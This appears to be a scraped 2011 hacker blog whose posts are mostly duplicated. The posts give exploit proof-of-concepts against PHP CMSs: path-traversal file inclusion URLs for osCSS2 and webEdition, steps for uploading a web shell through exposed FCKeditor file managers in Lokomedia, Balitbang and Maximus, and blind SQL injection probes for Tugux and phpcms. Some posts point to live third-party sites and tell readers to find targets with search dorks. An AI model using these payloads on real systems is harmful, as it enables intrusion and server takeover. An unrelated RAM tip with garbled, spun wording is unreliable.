osCSS2 2.1.0 RC12 Multiple Local File Inclusion Vulnerabilities
===================================================================
osCSS2 2.1.0 RC12 Multiple Local File Inclusion Vulnerabilities
===================================================================
Software: osCSS2 2.1.0 RC12
Vendor: http://www.oscss.org/
Vuln Type: Local File Inclusion
Download link: http://sourceforge.net/projects/oscss/files%2Foscss-2%2FosCSS 2.1. Final%2FosCSS2_2.1.0_preRC12.zip/download
Author: eidelweiss
contact: eidelweiss[at]windowslive[dot]com
Home: www.eidelweiss.info
Gratz: wellcome back YOGYACARDERLINK.web.id !!!
===================================================================
description:
osCSS is a php ecommerce shopping program. Built on a foundation of oscommerce GPL code .
This version bring the script to web standard using XHTML 1.1 strict for markup language and CSS for layout presentation.
----------------------------------
Vulnerability Details:
Some Vulnerability has been discovered by John Leitch (AutoSec Tools) that can be exploited via browser (xss & LFI) :
http://www.exploit-db.com/exploits/17069/
http://localhost/oscss2/admin108/index.php?page_admin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini
http://localhost/oscss2/admin108/popup_image.php?page_admin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini
-----------------------------------
Here is another vulnerability code i found there:
[!] admin/includes/template/oscss/gabarit-view.php
[!] admin/includes/template/defaut/gabarit-view.php
*/
$css=($_GET['forceview']=='print')? 'print' : 'view' ;
$CHARSET=(isset($_GET['forcecharset']))?$_GET['forcecharset'] : CHARSET ;
@include(DIR_WS_INCLUDES . 'content/'.$page_admin.'.top.inc');
require(DIR_WS_TEMPLATE.'inc/lib.template.php');
?>
-----------------------------------
[!] admin/includes/template/oscss/gabarit-2.php
*/
@include(DIR_WS_INCLUDES . 'content/'.$page_admin.'.top.inc');
require(DIR_WS_TEMPLATE.'inc/lib.template.php');
if (($init_theme=tep_test_gab_ele('inc/init_theme')) !=false) require($init_theme);
?>
-----------------------------------
exploit & p0c
[!] http://host/path_to_oscss/admin/includes/template/oscss/gabarit-view.php?page_admin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini
or
[!] http://host/path_to_oscss/admin/includes/template/oscss/gabarit-2.php?page_admin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini
or
[!] http://host/path_to_oscss/admin/includes/template/defaut/gabarit-view.php?page_admin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini
====================================================================
Nothing Impossible In This World Even Nobody`s Perfect
===================================================================
==========================| -=[ E0F ]=- |==========================
osCSS2 2.1.0 RC12 Multiple Local File Inclusion Vulnerabilities
===================================================================
Software: osCSS2 2.1.0 RC12
Vendor: http://www.oscss.org/
Vuln Type: Local File Inclusion
Download link: http://sourceforge.net/projects/oscss/files%2Foscss-2%2FosCSS 2.1. Final%2FosCSS2_2.1.0_preRC12.zip/download
Author: eidelweiss
contact: eidelweiss[at]windowslive[dot]com
Home: www.eidelweiss.info
Gratz: wellcome back YOGYACARDERLINK.web.id !!!
===================================================================
description:
osCSS is a php ecommerce shopping program. Built on a foundation of oscommerce GPL code .
This version bring the script to web standard using XHTML 1.1 strict for markup language and CSS for layout presentation.
----------------------------------
Vulnerability Details:
Some Vulnerability has been discovered by John Leitch (AutoSec Tools) that can be exploited via browser (xss & LFI) :
http://www.exploit-db.com/exploits/17069/
http://localhost/oscss2/admin108/index.php?page_admin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini
http://localhost/oscss2/admin108/popup_image.php?page_admin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini
-----------------------------------
Here is another vulnerability code i found there:
[!] admin/includes/template/oscss/gabarit-view.php
[!] admin/includes/template/defaut/gabarit-view.php
*/
$css=($_GET['forceview']=='print')? 'print' : 'view' ;
$CHARSET=(isset($_GET['forcecharset']))?$_GET['forcecharset'] : CHARSET ;
@include(DIR_WS_INCLUDES . 'content/'.$page_admin.'.top.inc');
require(DIR_WS_TEMPLATE.'inc/lib.template.php');
?>
-----------------------------------
[!] admin/includes/template/oscss/gabarit-2.php
*/
@include(DIR_WS_INCLUDES . 'content/'.$page_admin.'.top.inc');
require(DIR_WS_TEMPLATE.'inc/lib.template.php');
if (($init_theme=tep_test_gab_ele('inc/init_theme')) !=false) require($init_theme);
?>
-----------------------------------
exploit & p0c
[!] http://host/path_to_oscss/admin/includes/template/oscss/gabarit-view.php?page_admin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini
or
[!] http://host/path_to_oscss/admin/includes/template/oscss/gabarit-2.php?page_admin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini
or
[!] http://host/path_to_oscss/admin/includes/template/defaut/gabarit-view.php?page_admin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini
====================================================================
Nothing Impossible In This World Even Nobody`s Perfect
===================================================================
==========================| -=[ E0F ]=- |==========================
2011/03/28
webEdition CMS Version 6.1.0.2 (DOCUMENT_ROOT) Local File Inclusion vulnerability
===================================================================
webEdition CMS (DOCUMENT_ROOT) Local File Inclusion vulnerability
===================================================================
Software: webEdition CMS Version 6.1.0.2
Vendor: http://www.webedition.org
Vuln Type: Local File Inclusion
Download link: http://sourceforge.net/projects/webedition/files/webEdition/6.1.0.2/webEdition_6102.tar.gz/download
Author: eidelweiss
contact: eidelweiss[at]windowslive[dot]com
Home: www.eidelweiss.info
Gratz: wellcome back YOGYACARDERLINK.web.id !!!
===================================================================
description:
webEdition Version 6.1.0.2
webEdition is a web content management system licensed under the GPL
For system requirements,
installation and upgrade details, see the files INSTALL and the informations available on our website
http://www.webedition.org
see webEdition/license folder for license informations
see INSTALL for quick installation instructions.
----------------------------------
Vulnerability code:
index.php
/*****************************************************************************
* INITIALIZATION
*****************************************************************************/
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/conf/we_conf.inc.php");
require_once($_SERVER['DOCUMENT_ROOT'] . "/webEdition/we/include/we_message_reporting/we_message_reporting.class.php");
/*****************************************************************************
* INCLUDES
*****************************************************************************/
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we.inc.php");
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_html_tools.inc.php");
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_browser_check.inc.php");
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_classes/html/we_button.inc.php");
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_classes/html/we_htmlElement.inc.php");
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_classes/html/we_htmlTable.inc.php");
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_language/".$GLOBALS["WE_LANGUAGE"]."/start.inc.php");
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_language/".$GLOBALS["WE_LANGUAGE"]."/alert.inc.php");
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_language/".$GLOBALS["WE_LANGUAGE"]."/global.inc.php");
$ignore_browser = isset($_REQUEST["ignore_browser"]) && ($_REQUEST["ignore_browser"] === "true");
/*****************************************************************************
----------------------------------
exploit & p0c
[!] http://host/webEdition/index.php?DOCUMENT_ROOT= [lfi]
or
[!] http://host/path_to_webEdition/index.php?DOCUMENT_ROOT= [lfi]
Nb: seems Another vulnerability also available like LFD , XSS , RFI maybe and etc , but i didnt check and test yet.
====================================================================
Nothing Impossible In This World Even Nobody`s Perfect
===================================================================
==========================| -=[ E0F ]=- |==========================
webEdition CMS (DOCUMENT_ROOT) Local File Inclusion vulnerability
===================================================================
Software: webEdition CMS Version 6.1.0.2
Vendor: http://www.webedition.org
Vuln Type: Local File Inclusion
Download link: http://sourceforge.net/projects/webedition/files/webEdition/6.1.0.2/webEdition_6102.tar.gz/download
Author: eidelweiss
contact: eidelweiss[at]windowslive[dot]com
Home: www.eidelweiss.info
Gratz: wellcome back YOGYACARDERLINK.web.id !!!
===================================================================
description:
webEdition Version 6.1.0.2
webEdition is a web content management system licensed under the GPL
For system requirements,
installation and upgrade details, see the files INSTALL and the informations available on our website
http://www.webedition.org
see webEdition/license folder for license informations
see INSTALL for quick installation instructions.
----------------------------------
Vulnerability code:
index.php
/*****************************************************************************
* INITIALIZATION
*****************************************************************************/
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/conf/we_conf.inc.php");
require_once($_SERVER['DOCUMENT_ROOT'] . "/webEdition/we/include/we_message_reporting/we_message_reporting.class.php");
/*****************************************************************************
* INCLUDES
*****************************************************************************/
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we.inc.php");
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_html_tools.inc.php");
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_browser_check.inc.php");
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_classes/html/we_button.inc.php");
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_classes/html/we_htmlElement.inc.php");
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_classes/html/we_htmlTable.inc.php");
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_language/".$GLOBALS["WE_LANGUAGE"]."/start.inc.php");
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_language/".$GLOBALS["WE_LANGUAGE"]."/alert.inc.php");
include_once($_SERVER["DOCUMENT_ROOT"]."/webEdition/we/include/we_language/".$GLOBALS["WE_LANGUAGE"]."/global.inc.php");
$ignore_browser = isset($_REQUEST["ignore_browser"]) && ($_REQUEST["ignore_browser"] === "true");
/*****************************************************************************
----------------------------------
exploit & p0c
[!] http://host/webEdition/index.php?DOCUMENT_ROOT= [lfi]
or
[!] http://host/path_to_webEdition/index.php?DOCUMENT_ROOT= [lfi]
Nb: seems Another vulnerability also available like LFD , XSS , RFI maybe and etc , but i didnt check and test yet.
====================================================================
Nothing Impossible In This World Even Nobody`s Perfect
===================================================================
==========================| -=[ E0F ]=- |==========================
2011/03/20
CMS Lokomedia 1.5 Arbitary file upload vulnerability
===================================================================
CMS Lokomedia 1.5 Arbitary file upload vulnerability
===================================================================
Software: CMS Lokomedia
Vendor: http://bukulokomedia.com/home
Vuln Type: Arbitary file upload
Download link: http://bukulokomedia.com/lokomedia-1.5.rar
Author: eidelweiss
contact: eidelweiss[at]windowslive[dot]com
Home: www.eidelweiss.info
DORK: use your skill and play your imagination :P
Gratz:
- Kuris : status udah merit aja beib.. kgak undang² iks..
- Richie RebelgiRL : (Limited edition.. lol) live is never flate so enjoy this live mate ^_^
===================================================================
----------------------------------
exploit & p0c
[!] http://host/path_to_lokomedia/tinymcpuk/filemanager/browser.html // upload your file here
or
[!] http://host/tinymcpuk/filemanager/browser.html
or
[!] http://host//tinymcpuk/filemanager/frmupload.html
or
[!] http://host/path_to_lokomedia/tinymcpuk/filemanager/frmupload.html
your shell or file will be placed here
/*------------------------------------------------------------------------------*/
/* Path to user files relative to the document root (no trailing slash) */
/*------------------------------------------------------------------------------*/
$fckphp_config['UserFilesPath'] = "./lokomedia/tinymcpuk/gambar" ; // <= here
/*==============================================================================*/
/* Apabila sudah di-onlinekan, ubah baris 47 dengan settingan seperti berikut:
$fckphp_config['UserFilesPath'] = "./tinymcpuk/gambar" ; */ // <= or here
----------------------------------
live poc : http://www.ikafela.com./tinymcpuk/filemanager/browser.html
====================================================================
Nothing Impossible In This World Even Nobody`s Perfect
===================================================================
==========================| -=[ E0F ]=- |==========================
CMS Lokomedia 1.5 Arbitary file upload vulnerability
===================================================================
Software: CMS Lokomedia
Vendor: http://bukulokomedia.com/home
Vuln Type: Arbitary file upload
Download link: http://bukulokomedia.com/lokomedia-1.5.rar
Author: eidelweiss
contact: eidelweiss[at]windowslive[dot]com
Home: www.eidelweiss.info
DORK: use your skill and play your imagination :P
Gratz:
- Kuris : status udah merit aja beib.. kgak undang² iks..
- Richie RebelgiRL : (Limited edition.. lol) live is never flate so enjoy this live mate ^_^
===================================================================
----------------------------------
exploit & p0c
[!] http://host/path_to_lokomedia/tinymcpuk/filemanager/browser.html // upload your file here
or
[!] http://host/tinymcpuk/filemanager/browser.html
or
[!] http://host//tinymcpuk/filemanager/frmupload.html
or
[!] http://host/path_to_lokomedia/tinymcpuk/filemanager/frmupload.html
your shell or file will be placed here
/*------------------------------------------------------------------------------*/
/* Path to user files relative to the document root (no trailing slash) */
/*------------------------------------------------------------------------------*/
$fckphp_config['UserFilesPath'] = "./lokomedia/tinymcpuk/gambar" ; // <= here
/*==============================================================================*/
/* Apabila sudah di-onlinekan, ubah baris 47 dengan settingan seperti berikut:
$fckphp_config['UserFilesPath'] = "./tinymcpuk/gambar" ; */ // <= or here
----------------------------------
live poc : http://www.ikafela.com./tinymcpuk/filemanager/browser.html
====================================================================
Nothing Impossible In This World Even Nobody`s Perfect
===================================================================
==========================| -=[ E0F ]=- |==========================
2011/03/19
CMS Balitbang v 3.3 Arbitary file upload vulnerability
===================================================================
CMS Balitbang v.3.3 Arbitary file upload vulnerability
===================================================================
Software: CMS Balitbang
Vendor: www.kajianwebsite.org
Vuln Type: Arbitary file upload
Download link: http://www.kajianwebsite.org/download/CMS%20versi%203.3.zip
Author: eidelweiss
contact: eidelweiss[at]windowslive[dot]com
Home: www.eidelweiss.info
Gratz: xx_user , kuris , and YOU !!!
===================================================================
description:
CMS balitbang is content management system for educational website.
Namanya sih bukan CMS Balitbang, cuma berhubungan CMS ini dikembangin oleh Balitbang Kemendiknas makanya lebih terkenal dengan sebutan CMS Balitbang. CMS Balitbang ini ditujukan untuk kepentingan dunia pendidikan Indonesia terutama untuk sekolah sekolah yang belum punya Website Sekolahnya. Harapannya kedepan Balitbang menginginkan semua sekolah di Indonesia punya Sistem Informasi Berbasis Website yang bisa diakses oleh banyak orang.
----------------------------------
Vulnerability details:
CMS Balitbang is using the old version of FCKeditor for upload file to all user.And all know the old version of FCKeditor have a vulnerability and attacker might be able to upload arbitrary files containing malicious PHP code due to multiple file extensions isn't properly checked.
Here is the code:
/webtemp/functions/editor/filemanager/connectors/php/config.php
global $Config ;
// SECURITY: You must explicitly enable this "connector". (Set it to "true").
// WARNING: don't just set "$Config['Enabled'] = true ;", you must be sure that only
// authenticated users can access this file or use some kind of session checking.
$Config['Enabled'] = true ; // <= 1
---
// Path to user files relative to the document root.
$Config['UserFilesPath'] = 'http://localhost/webtemp/userfiles/' ; // <= here is the path of attacker file or shell backdoor will be placed.
// following setting enabled.
$Config['ForceSingleExtension'] = true ; // <= 2
$Config['AllowedExtensions']['File'] = array('7z', 'aiff', 'asf', 'avi', 'bmp', 'csv', 'doc', 'fla', 'flv', 'gif', 'gz', 'gzip', 'jpeg', 'jpg', 'mid', 'mov', 'mp3', 'mp4', 'mpc', 'mpeg', 'mpg', 'ods', 'odt', 'pdf', 'png', 'ppt', 'pxd', 'qt', 'ram', 'rar', 'rm', 'rmi', 'rmvb', 'rtf', 'sdc', 'sitd', 'swf', 'sxc', 'sxw', 'tar', 'tgz', 'tif', 'tiff', 'txt', 'vsd', 'wav', 'wma', 'wmv', 'xls', 'xml', 'zip') ; // <= 3
---
with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code due to multiple file extensions isn't properly checked
----------------------------------
exploit & p0c
[!] http://host//webtemp/functions/editor/filemanager/connectors/uploadtest.html // upload your file here
or
[!] http://host/path_to_CMSBalitbang/functions/editor/filemanager/connectors/uploadtest.html
your shell or file will be placed here
[!] http://localhost/webtemp/userfiles/ <= here
====================================================================
Nothing Impossible In This World Even Nobody`s Perfect
===================================================================
==========================| -=[ E0F ]=- |==========================
CMS Balitbang v.3.3 Arbitary file upload vulnerability
===================================================================
Software: CMS Balitbang
Vendor: www.kajianwebsite.org
Vuln Type: Arbitary file upload
Download link: http://www.kajianwebsite.org/download/CMS%20versi%203.3.zip
Author: eidelweiss
contact: eidelweiss[at]windowslive[dot]com
Home: www.eidelweiss.info
Gratz: xx_user , kuris , and YOU !!!
===================================================================
description:
CMS balitbang is content management system for educational website.
Namanya sih bukan CMS Balitbang, cuma berhubungan CMS ini dikembangin oleh Balitbang Kemendiknas makanya lebih terkenal dengan sebutan CMS Balitbang. CMS Balitbang ini ditujukan untuk kepentingan dunia pendidikan Indonesia terutama untuk sekolah sekolah yang belum punya Website Sekolahnya. Harapannya kedepan Balitbang menginginkan semua sekolah di Indonesia punya Sistem Informasi Berbasis Website yang bisa diakses oleh banyak orang.
----------------------------------
Vulnerability details:
CMS Balitbang is using the old version of FCKeditor for upload file to all user.And all know the old version of FCKeditor have a vulnerability and attacker might be able to upload arbitrary files containing malicious PHP code due to multiple file extensions isn't properly checked.
Here is the code:
/webtemp/functions/editor/filemanager/connectors/php/config.php
global $Config ;
// SECURITY: You must explicitly enable this "connector". (Set it to "true").
// WARNING: don't just set "$Config['Enabled'] = true ;", you must be sure that only
// authenticated users can access this file or use some kind of session checking.
$Config['Enabled'] = true ; // <= 1
---
// Path to user files relative to the document root.
$Config['UserFilesPath'] = 'http://localhost/webtemp/userfiles/' ; // <= here is the path of attacker file or shell backdoor will be placed.
// following setting enabled.
$Config['ForceSingleExtension'] = true ; // <= 2
$Config['AllowedExtensions']['File'] = array('7z', 'aiff', 'asf', 'avi', 'bmp', 'csv', 'doc', 'fla', 'flv', 'gif', 'gz', 'gzip', 'jpeg', 'jpg', 'mid', 'mov', 'mp3', 'mp4', 'mpc', 'mpeg', 'mpg', 'ods', 'odt', 'pdf', 'png', 'ppt', 'pxd', 'qt', 'ram', 'rar', 'rm', 'rmi', 'rmvb', 'rtf', 'sdc', 'sitd', 'swf', 'sxc', 'sxw', 'tar', 'tgz', 'tif', 'tiff', 'txt', 'vsd', 'wav', 'wma', 'wmv', 'xls', 'xml', 'zip') ; // <= 3
---
with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code due to multiple file extensions isn't properly checked
----------------------------------
exploit & p0c
[!] http://host//webtemp/functions/editor/filemanager/connectors/uploadtest.html // upload your file here
or
[!] http://host/path_to_CMSBalitbang/functions/editor/filemanager/connectors/uploadtest.html
your shell or file will be placed here
[!] http://localhost/webtemp/userfiles/ <= here
====================================================================
Nothing Impossible In This World Even Nobody`s Perfect
===================================================================
==========================| -=[ E0F ]=- |==========================
Trick Meningkatkan kecepatan RAM komputer
Just many users questioned me to find a ploy to boost your computer speed.before a long serch i find a ploy to speed up your pc and post it on web
The procedure is follows:
1}.Start any application, say Word. Open some large documents.
2). Press CTRL+SHIFT+ESC to open Windows Task Manager and click Processes tab and sort the list in descending order on Mem Usage. You will notice that WINWORD.EXE will be somewhere at the top, using multiple MBs of memory.
3). Now thrash to Word and austerely minimize it. (Don’t use the Minimize All Windows selection of the task bar).
4). Now go back to the Windows Task Manager and see everywhere WINWORD.EXE is listed. Most doubtless you will not find it at the top. You will typically have to scroll to the underneath of the list to find Word. Now check out the quantity of RAM it is using. Bowled over? The memory utilization has reduced by a huge quantity.
5). Minimize each application that you are currently not effective on by clicking on the Minimize pin & you can boost the quantity of void RAM by a substantial margin. Depending upon the digit and type of applications you use together, the difference can be as much as 50 percent of superfluous RAM.
In any multitasking system, minimizing an application means that it won’t be utilized by the user aptly now. Consequently, the OS involuntarily makes the application use virtual memory & keeps bare nominal amounts of the code in corporal RAM.
The procedure is follows:
1}.Start any application, say Word. Open some large documents.
2). Press CTRL+SHIFT+ESC to open Windows Task Manager and click Processes tab and sort the list in descending order on Mem Usage. You will notice that WINWORD.EXE will be somewhere at the top, using multiple MBs of memory.
3). Now thrash to Word and austerely minimize it. (Don’t use the Minimize All Windows selection of the task bar).
4). Now go back to the Windows Task Manager and see everywhere WINWORD.EXE is listed. Most doubtless you will not find it at the top. You will typically have to scroll to the underneath of the list to find Word. Now check out the quantity of RAM it is using. Bowled over? The memory utilization has reduced by a huge quantity.
5). Minimize each application that you are currently not effective on by clicking on the Minimize pin & you can boost the quantity of void RAM by a substantial margin. Depending upon the digit and type of applications you use together, the difference can be as much as 50 percent of superfluous RAM.
In any multitasking system, minimizing an application means that it won’t be utilized by the user aptly now. Consequently, the OS involuntarily makes the application use virtual memory & keeps bare nominal amounts of the code in corporal RAM.
2011/03/18
Tugux CMS (nid) BLIND sql injection vulnerability
===================================================================
Tugux CMS (nid) BLIND sql injection vulnerability
===================================================================
Software: Tugux CMS
Vendor: www.tugux.com
Vuln Type: BLind SQL Injection
Download link: http://sourceforge.net/projects/tuguxcms/files/tuguxCMS_v.1.0_final.rar/download
Author: eidelweiss
contact: eidelweiss[at]windowslive[dot]com
Home: www.eidelweiss.info
===================================================================
exploit & p0c
[!] latest.php?nid=[valid nid]
Example p0c
[!] http://host/latest.php?nid=9 <= True
[!] http://host/latest.php?nid=-9 <= False
[+] http://host:3306 <= download the file , save and open with c++ or wordpad will show mysql version
[!] sample: http://www.tugux.com:3306 result : 5.0.92-community (use versi 5.0.92) :D
====================================================================
Nothing Impossible In This World Even Nobody`s Perfect
===================================================================
==========================| -=[ E0F ]=- |==========================
Tugux CMS (nid) BLIND sql injection vulnerability
===================================================================
Software: Tugux CMS
Vendor: www.tugux.com
Vuln Type: BLind SQL Injection
Download link: http://sourceforge.net/projects/tuguxcms/files/tuguxCMS_v.1.0_final.rar/download
Author: eidelweiss
contact: eidelweiss[at]windowslive[dot]com
Home: www.eidelweiss.info
===================================================================
exploit & p0c
[!] latest.php?nid=[valid nid]
Example p0c
[!] http://host/latest.php?nid=9 <= True
[!] http://host/latest.php?nid=-9 <= False
[+] http://host:3306 <= download the file , save and open with c++ or wordpad will show mysql version
[!] sample: http://www.tugux.com:3306 result : 5.0.92-community (use versi 5.0.92) :D
====================================================================
Nothing Impossible In This World Even Nobody`s Perfect
===================================================================
==========================| -=[ E0F ]=- |==========================
2011/01/21
phpcms V9 Blind SQL Injection Vulnerability
=================================================================
phpcms V9 BLind SQL Injection Vulnerability
=================================================================
Software: phpcms V9
Vendor: www.phpcms.cn
Vuln Type: BLind SQL Injection
Download link: http://www.phpcms.cn/2010/1229/326.html
Author: eidelweiss
contact: eidelweiss[at]windowslive[dot]com
Home: www.eidelweiss.info
=================================================================
exploit & p0c
[!] index.php?m=content&c=rss&catid=[valid catid]
Example p0c
[!] http://host/index.php?m=content&c=rss&catid=10 <= True
[!] http://host/index.php?m=content&c=rss&catid=-10 <= False
[+] http://host/index.php?m=content&c=rss&catid=5 <= show MySQL Error (table)
=================================================================
Nothing Impossible In This World Even Nobody`s Perfect
=================================================================
=========================| -=[ E0F ]=- |=========================
phpcms V9 BLind SQL Injection Vulnerability
=================================================================
Software: phpcms V9
Vendor: www.phpcms.cn
Vuln Type: BLind SQL Injection
Download link: http://www.phpcms.cn/2010/1229/326.html
Author: eidelweiss
contact: eidelweiss[at]windowslive[dot]com
Home: www.eidelweiss.info
=================================================================
exploit & p0c
[!] index.php?m=content&c=rss&catid=[valid catid]
Example p0c
[!] http://host/index.php?m=content&c=rss&catid=10 <= True
[!] http://host/index.php?m=content&c=rss&catid=-10 <= False
[+] http://host/index.php?m=content&c=rss&catid=5 <= show MySQL Error (table)
=================================================================
Nothing Impossible In This World Even Nobody`s Perfect
=================================================================
=========================| -=[ E0F ]=- |=========================
2011/01/10
maximus-cms (fckeditor) Arbitrary File Upload Vulnerability
####################################################################
maximus-cms (fckeditor) Arbitrary File Upload Vulnerability
####################################################################
____ __ __ __
/\ _`\ /\ \ __ /\ \__/\ \
\ \ \L\_\__ __ ___\ \ \/'\ /\_\ ___ __ \ \ ,_\ \ \___ __
\ \ _\/\ \/\ \ /'___\ \ , < \/\ \ /' _ `\ /'_ `\ \ \ \/\ \ _ `\ /'__`\
\ \ \/\ \ \_\ \/\ \__/\ \ \\`\\ \ \/\ \/\ \/\ \L\ \ \ \ \_\ \ \ \ \/\ __/
\ \_\ \ \____/\ \____\\ \_\ \_\ \_\ \_\ \_\ \____ \ \ \__\\ \_\ \_\ \____\
\/_/ \/___/ \/____/ \/_/\/_/\/_/\/_/\/_/\/___L\ \ \/__/ \/_/\/_/\/____/
/\____/
\_/__/
__ __ __ ______ Author:eidelweiss
/\ \ __/\ \ /\ \ /\ _ \
\ \ \/\ \ \ \ __\ \ \____ \ \ \L\ \ _____ _____ ____
\ \ \ \ \ \ \ /'__`\ \ '__`\ \ \ __ \/\ '__`\/\ '__`\ /',__\
\ \ \_/ \_\ \/\ __/\ \ \L\ \ \ \ \/\ \ \ \L\ \ \ \L\ \/\__, `\
\ `\___x___/\ \____\\ \_,__/ \ \_\ \_\ \ ,__/\ \ ,__/\/\____/
'\/__//__/ \/____/ \/___/ \/_/\/_/\ \ \/ \ \ \/ \/___/
\ \_\ \ \_\
\/_/ \/_/
| |
/|_________________________________________________________________________|\
/ \
/===============================================================================\
|Exploit Title: maximus-cms (fckeditor) Arbitrary File Upload Vulnerability |
|develop: http://www.php-maximus.org |
|Download: http://ftp1.toocharger.com/scgdnLI/maximus-cms-2008_5129.zip |
|Version: Maximus 2008 CMS: Web Portal System (v.1.1.2) |
|Tested On: Live site |
|Dork: use your skill and play your imagination :P |
|Author: eidelweiss |
|contact: eidelweiss[at]windowslive[dot]com |
|Home: http://www.eidelweiss.info |
| |
| |
| |
\===============================================================================/
/ NOTHING IMPOSSIBLE IN THIS WORLD EVEN NOBODY`s PERFECT \
---------------------------------------------------------------------------------
exploit # path/html/FCKeditor/editor/filemanager/connectors/uploadtest.html
[!] first find the target host
ex: www.site.com or www.target.com/maximus
then # http://site.com/FCKeditor/editor/filemanager/connectors/uploadtest.html#
[!] select # "php" as "File Uploader" to use... and select "file" as Resource Type
[!] Upload There Hacked.txt or whatever.txt And Copy the Output Link or
[!] after upload without any errors your file will be here: /FCKeditor/upload/
ex: http://site.com//FCKeditor/upload/whatever.txt
NB: remote shell upload also possible !!!
Read the config.php file in "/FCKeditor/editor/filemanager/connectors/php/"
----------
$Config['Enabled'] = true ; // <=
// Path to user files relative to the document root.
$Config['UserFilesPath'] = '/FCKeditor/upload/' ;
----------
and also $Config['AllowedExtensions']['File']
with a default configuration of this script, an attacker might be able to upload arbitrary
files containing malicious PHP code due to multiple file extensions isn't properly checked
=========================| -=[ E0F ]=- |=================================
maximus-cms (fckeditor) Arbitrary File Upload Vulnerability
####################################################################
____ __ __ __
/\ _`\ /\ \ __ /\ \__/\ \
\ \ \L\_\__ __ ___\ \ \/'\ /\_\ ___ __ \ \ ,_\ \ \___ __
\ \ _\/\ \/\ \ /'___\ \ , < \/\ \ /' _ `\ /'_ `\ \ \ \/\ \ _ `\ /'__`\
\ \ \/\ \ \_\ \/\ \__/\ \ \\`\\ \ \/\ \/\ \/\ \L\ \ \ \ \_\ \ \ \ \/\ __/
\ \_\ \ \____/\ \____\\ \_\ \_\ \_\ \_\ \_\ \____ \ \ \__\\ \_\ \_\ \____\
\/_/ \/___/ \/____/ \/_/\/_/\/_/\/_/\/_/\/___L\ \ \/__/ \/_/\/_/\/____/
/\____/
\_/__/
__ __ __ ______ Author:eidelweiss
/\ \ __/\ \ /\ \ /\ _ \
\ \ \/\ \ \ \ __\ \ \____ \ \ \L\ \ _____ _____ ____
\ \ \ \ \ \ \ /'__`\ \ '__`\ \ \ __ \/\ '__`\/\ '__`\ /',__\
\ \ \_/ \_\ \/\ __/\ \ \L\ \ \ \ \/\ \ \ \L\ \ \ \L\ \/\__, `\
\ `\___x___/\ \____\\ \_,__/ \ \_\ \_\ \ ,__/\ \ ,__/\/\____/
'\/__//__/ \/____/ \/___/ \/_/\/_/\ \ \/ \ \ \/ \/___/
\ \_\ \ \_\
\/_/ \/_/
| |
/|_________________________________________________________________________|\
/ \
/===============================================================================\
|Exploit Title: maximus-cms (fckeditor) Arbitrary File Upload Vulnerability |
|develop: http://www.php-maximus.org |
|Download: http://ftp1.toocharger.com/scgdnLI/maximus-cms-2008_5129.zip |
|Version: Maximus 2008 CMS: Web Portal System (v.1.1.2) |
|Tested On: Live site |
|Dork: use your skill and play your imagination :P |
|Author: eidelweiss |
|contact: eidelweiss[at]windowslive[dot]com |
|Home: http://www.eidelweiss.info |
| |
| |
| |
\===============================================================================/
/ NOTHING IMPOSSIBLE IN THIS WORLD EVEN NOBODY`s PERFECT \
---------------------------------------------------------------------------------
exploit # path/html/FCKeditor/editor/filemanager/connectors/uploadtest.html
[!] first find the target host
ex: www.site.com or www.target.com/maximus
then # http://site.com/FCKeditor/editor/filemanager/connectors/uploadtest.html#
[!] select # "php" as "File Uploader" to use... and select "file" as Resource Type
[!] Upload There Hacked.txt or whatever.txt And Copy the Output Link or
[!] after upload without any errors your file will be here: /FCKeditor/upload/
ex: http://site.com//FCKeditor/upload/whatever.txt
NB: remote shell upload also possible !!!
Read the config.php file in "/FCKeditor/editor/filemanager/connectors/php/"
----------
$Config['Enabled'] = true ; // <=
// Path to user files relative to the document root.
$Config['UserFilesPath'] = '/FCKeditor/upload/' ;
----------
and also $Config['AllowedExtensions']['File']
